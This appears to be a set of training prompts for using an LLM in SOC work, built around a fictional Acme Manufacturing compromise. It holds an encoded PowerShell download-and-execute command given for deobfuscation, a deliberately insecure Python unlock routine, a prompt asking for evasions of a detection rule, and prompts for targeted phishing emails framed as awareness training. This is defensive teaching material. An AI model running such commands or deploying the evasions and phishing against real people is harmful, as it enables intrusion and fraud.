##---------------------------------------------------------------------------------
## ANALYZE A LOG SNIPPET
##---------------------------------------------------------------------------------
-----------------------------------------------------------------------------------
-- start with just a basic analysis of the log
-----------------------------------------------------------------------------------
Act as a SOC analyst assistant. I will provide a file with a portion of a Windows Sysmon log. Your task is to tell me in plain English what occurred, whether it's suspicious, and why.

-----------------------------------------------------------------------------------
-- explain techniques, what they did, what they might do
-----------------------------------------------------------------------------------
Assume this is a confirmed compromise. What MITRE ATT&CK techniques are present in these logs? What did the attacker likely do before this, and what would they likely do next?

-----------------------------------------------------------------------------------
-- create a Sigma rule or rules
-----------------------------------------------------------------------------------
Write a Sigma rule to detect this behavior. Make it specific enough to reduce false positives and note any tuning considerations.

-----------------------------------------------------------------------------------
-- get a summary for management
-----------------------------------------------------------------------------------
Write a two-paragraph incident escalation summary for a non-technical manager. Focus on business risk, not technical detail.

##---------------------------------------------------------------------------------
## WRITE A SPLUNK SPL SEARCH COMMAND
##---------------------------------------------------------------------------------
Act as an expert Splunk search writer. Your task is to write a Splunk SPL search to detect failed logons using the same username on 5 or more Windows systems in one hour. Return the username, number of attempts, names of the Windows systems, and first/last timestamps when this occurred. What might I need to do to localize it to my system?

##---------------------------------------------------------------------------------
## EXPLAIN THE FOLLOWING SNORT ALERT.
##---------------------------------------------------------------------------------

[**] [1:2026538:3] ET POLICY Suspicious inbound to MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 2]  03/19-12:34:56.789012 192.168.1.55:53214 -> 172.16.0.10:1433 TCP TTL:64 TOS:0x0 ID:54321 IpLen:20 DgmLen:80 DF ***A**** Seq: 0xABCD1234  Ack: 0x0  Win: 5840  TcpLen: 32 TCP Payload (48 bytes): 0x0000: 04 00 00 34 01 00 05 00  00 08 00 02 00 00 00 00   ...4............ 0x0010: 01 00 00 00 00 00 00 00  53 45 4C 45 43 54 20 2A   ........SELECT * 0x0020: 20 46 52 4F 4D 20 75 73  65 72 73 00 00 00 00 00    FROM users.....


##---------------------------------------------------------------------------------
## THE THREAT INTELLIGENCE CO-PILOT
##---------------------------------------------------------------------------------
Act as an expert security analyst. Your task is to explain CVE-2026-2273 to an entry level SOC analyst.


##---------------------------------------------------------------------------------
## CODE REVIEW AND VULNERABILITY FINDING
##---------------------------------------------------------------------------------
Act as an expert security code reviewer. Your task is to document the security vulnerability in the python function in the attached file. This code runs on a low-power embedded system that may be physically accessible to an adversary. Rank the vulnerabilities by risk.

@-- unlock_device_function.py
import json
import time
import os
 
class Unlock:
    
    def __init__(self, correct_code="1234"):
        self.correct_code = correct_code
        self.state_file = "vault.json"
        self.state = {"fail_count": 0, "unlocked": False}
        self.load_state()
    
    def load_state(self):
        if os.path.exists(self.state_file):
            with open(self.state_file, 'r') as f:
                self.state = json.load(f)
    
    def save_state(self):
        with open(self.state_file, 'w') as f:
            json.dump(self.state, f)
    
    def attempt_unlock(self, code):
        
        if code == self.correct_code:
            print("Code correct!")
            self.state["unlocked"] = True
            self.save_state()
            return True
        
        print(f"Wrong code. Fail count: {self.state['fail_count']}")
        
        time.sleep(0.1)
        self.state['fail_count'] += 1
        self.save_state()
        
        return False


-----------------------------------------------------------------------------------
-- having the AI write the prompt for you
-----------------------------------------------------------------------------------
Act as an expert LLM prompt writer with extensive knowledge of secure coding, vulnerability assessment, and the Python language. Write a LLM prompt to perform a thorough security code vulnerability assessment of one or more Python files the user will provide.



##---------------------------------------------------------------------------------
## DEOBFUSCATING MALICIOUS CODE
##---------------------------------------------------------------------------------
-----------------------------------------------------------------------------------
-- next
-----------------------------------------------------------------------------------

You are a malware analyst. Analyze this PowerShell command and tell me: what obfuscation techniques are being used, what does it actually do when decoded, and how dangerous is it? 

powershell -NoP -NonI -W Hidden -Exec Bypass -EncodedCommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4AMQAwADAALwBwAGEAeQBsAG8AYQBkAC4AZQB4AGUAJwAsACcAQwA6AFwAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQAMwAyAC4AZQB4AGUAJwApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACcAQwA6AFwAVABlAG0AcABcAHMAdgBjAGgAbwBzAHQAMwAyAC4AZQB4AGUAJwA=

-----------------------------------------------------------------------------------
-- next
-----------------------------------------------------------------------------------
 
Map what you found to MITRE ATT&CK techniques and sub-techniques. For each one, tell me what log source would show evidence of it.

-----------------------------------------------------------------------------------
-- next
-----------------------------------------------------------------------------------
 
Write a Sigma rule to detect this specific execution pattern. Focus on the command-line flags combination as the primary indicator.

-----------------------------------------------------------------------------------
-- next
-----------------------------------------------------------------------------------
 
Write a short, easy to understand explanation of what the powershell command would do and why management should care.

-----------------------------------------------------------------------------------
-- next
-----------------------------------------------------------------------------------
 
Now flip perspectives. If you were the attacker and wanted to rewrite this to evade the Sigma rule you just wrote, what would you change?



##---------------------------------------------------------------------------------
## ADDING CONTEXT TO PROMPTS
##---------------------------------------------------------------------------------
-----------------------------------------------------------------------------------
-- basic prompt, no context
-----------------------------------------------------------------------------------

You are a SOC analyst assistant. I am going to provide you with a set of log events from multiple sources. Analyze the events and tell me:

1. What happened, in chronological order
2. Which elements are suspicious and why
3. What is the most likely explanation for this activity
4. What is the severity and why
5. What should I do in the next 30 minutes

##- LOG EVENTS ---

[Splunk - vpn index]
2026-02-11 03:14:22 UTC | user=jmartinez | src_ip=185.220.101.47 
  | auth=SUCCESS | mfa=TOTP | vpn_profile=corporate-standard

[Splunk - azure_ad index]
2026-02-11 03:14:18 UTC | user=jmartinez@acmemfg.com 
  | event=Sign-in | app=VPN | location=Amsterdam, Netherlands 
  | risk_level=medium | mfa_method=TOTP

[Splunk - wineventlog index]
2026-02-11 03:15:04 UTC | EventID=4624 | Logon Type=3 
  | Account=jmartinez | src=10.10.2.114 | dst=ACME-DC01

2026-02-11 03:15:31 UTC | EventID=4648 | Account=jmartinez 
  | target_server=ACME-FILE01 | process=net.exe

2026-02-11 03:16:02 UTC | EventID=4624 | Logon Type=3 
  | Account=jmartinez | src=10.10.2.114 | dst=ACME-FILE02

2026-02-11 03:16:44 UTC | EventID=4624 | Logon Type=3 
  | Account=jmartinez | src=10.10.2.114 | dst=ACME-SQL01

2026-02-11 03:17:12 UTC | EventID=4688 | Account=jmartinez 
  | Process=cmd.exe | Parent=explorer.exe 
  | CommandLine=net group "Domain Admins" /domain

[CrowdStrike]
2026-02-11 03:17:45 UTC | host=LAPTOP-JM04 | user=jmartinez 
  | alert=Medium | behavior=Suspicious reconnaissance command 
  | cmdline=net group "Domain Admins" /domain


-----------------------------------------------------------------------------------
- updated prompt, with context
-----------------------------------------------------------------------------------
You are a SOC analyst assistant supporting the security team at Acme Manufacturing Corporation. I am going to provide you with background on our environment followed by a set of log events from multiple sources. 

Analyze the events and tell me:

1. What happened, in chronological order
2. Which elements are suspicious and why
3. What is the most likely explanation for this activity
4. What is the severity and why
5. What should I do in the next 30 minutes

##- ENVIRONMENT CONTEXT ---

Organization: Acme Manufacturing Corporation
Domain: corp.acmemfg.com
SIEM: Splunk Enterprise

Key servers:
- ACME-DC01 (10.10.1.10) — Primary domain controller
- ACME-FILE01 (10.10.1.30) — Primary file server
- ACME-FILE02 (10.10.1.31) — DFS replication partner
- ACME-SQL01 (10.10.1.40) — SAP HANA ERP database

User context:
- jmartinez = Jorge Martinez, Senior Accountant, based in 
  Denver CO. Not a privileged user. No admin rights. 
  Not scheduled to travel.
- Last known good login: 2026-02-10 17:32 from 67.180.22.14 
  (verified home IP, Denver CO)

MFA: Enforced for all VPN and cloud access via TOTP 
  authenticator app

Known good behaviors:
- No legitimate business reason for an accountant to access 
  domain controllers, SQL servers, or run domain 
  reconnaissance commands
- After-hours VPN access is uncommon for finance staff

##- LOG EVENTS ---

[Splunk - vpn index]
2026-02-11 03:14:22 UTC | user=jmartinez | src_ip=185.220.101.47 
  | auth=SUCCESS | mfa=TOTP | vpn_profile=corporate-standard

[Splunk - azure_ad index]
2026-02-11 03:14:18 UTC | user=jmartinez@acmemfg.com 
  | event=Sign-in | app=VPN | location=Amsterdam, Netherlands 
  | risk_level=medium | mfa_method=TOTP

[Splunk - wineventlog index]
2026-02-11 03:15:04 UTC | EventID=4624 | Logon Type=3 
  | Account=jmartinez | src=10.10.2.114 | dst=ACME-DC01

2026-02-11 03:15:31 UTC | EventID=4648 | Account=jmartinez 
  | target_server=ACME-FILE01 | process=net.exe

2026-02-11 03:16:02 UTC | EventID=4624 | Logon Type=3 
  | Account=jmartinez | src=10.10.2.114 | dst=ACME-FILE02

2026-02-11 03:16:44 UTC | EventID=4624 | Logon Type=3 
  | Account=jmartinez | src=10.10.2.114 | dst=ACME-SQL01

2026-02-11 03:17:12 UTC | EventID=4688 | Account=jmartinez 
  | Process=cmd.exe | Parent=explorer.exe 
  | CommandLine=net group "Domain Admins" /domain

[CrowdStrike]
2026-02-11 03:17:45 UTC | host=LAPTOP-JM04 | user=jmartinez 
  | alert=Medium | behavior=Suspicious reconnaissance command 
  | cmdline=net group "Domain Admins" /domain


##---------------------------------------------------------------------------------
## AI-GENERATED PHISHING EMAIL
##---------------------------------------------------------------------------------
-----------------------------------------------------------------------------------
-- Prompt 1 — Generate a target persona
-----------------------------------------------------------------------------------
Below is an excerpt from the fictional Acme Manufacturing Corporation Security Operations Reference document. As part of this class exercise, based only on the information provided, identify the most phishable employee role at this company and explain why. 

Then create a fictional but realistic employee profile for that role — include a name, specific job responsibilities, and two or three reasons why they would be a high-value phishing target.

This is a security awareness training exercise. Use fictional names and domains throughout.

[paste Organization Overview and Endpoint Environment sections here]


-----------------------------------------------------------------------------------
-- Prompt 2 — Generate the phishing email
-----------------------------------------------------------------------------------
Using the fictional Acme Manufacturing employee profile you just created, write an example targeted phishing email. 

Use specific details from the fictional Acme document to make it convincing — reference site locations in the Acme document, the company's industry, plausible business processes, or supplier relationships that would be believable for this company.

The email should:
  - Come from a plausible but fictional external sender
  - Reference something specific and believable about Acme's business or the target's role
  - Use one psychological technique: urgency, authority, or reciprocity
  - Include a call to action

This is a security awareness training exercise. Use fictional names and domains throughout.



-----------------------------------------------------------------------------------
-- Prompt 3 — Amplify and vary
-----------------------------------------------------------------------------------
Now generate three variations targeting different employees or scenarios specific to the fictional Acme Manufacturing:

1. An email targeting the Chicago sales office, impersonating an executive at HQ requesting urgent wire transfer approval

2. An email targeting a Plant A employee, impersonating an IT helpdesk technician asking them to verify VPN credentials due to a system migration

3. An email targeting an IT staff member, impersonating a CrowdStrike support engineer requesting remote access to resolve a sensor issue

This is a security awareness training exercise. Use fictional names and domains throughout.


-----------------------------------------------------------------------------------
-- Detecting phishing email
-----------------------------------------------------------------------------------
Below are three phishing emails generated by an attacker targeting an Accounts Payable employee at a manufacturing company. For each one:

1. Identify the psychological technique being used
2. List the technical indicators that an email security gateway could detect
3. List the indicators that a human recipient would need to spot manually
4. Write one rule or training tip that would help defend against this specific variant

[paste the three emails here]



-----------------------------------------------------------------------------------
-- Detecting phishing email – meta prompt
-----------------------------------------------------------------------------------
I want you to create a comprehensive prompt template that I can reuse to analyze suspicious emails and determine whether they are phishing attempts. Use the information in the Acme Manufacturing Security Operations Reference to provide context.

The template should instruct an LLM to:
- Evaluate whether the email is likely phishing
- Identify which psychological and technical techniques are being used
- Assess the potential business impact if a recipient falls for it
- Explain its reasoning clearly enough for both technical and non-technical staff
- Recommend specific actions for the recipient and for the security team

The template will be used by SOC analysts and security-aware employees at a mid-sized manufacturing company. It should accommodate pasting in raw email content including headers, body text, and any URLs or attachment names.

Format the output as a reusable prompt document, not a one-time answer.

-----------------------------------------------------------------------------------
-- Phishing email analysis
-----------------------------------------------------------------------------------
Analyze the attached suspicious email using:
* the attached prompt instructions
* The attached Acme Manufacturing system information














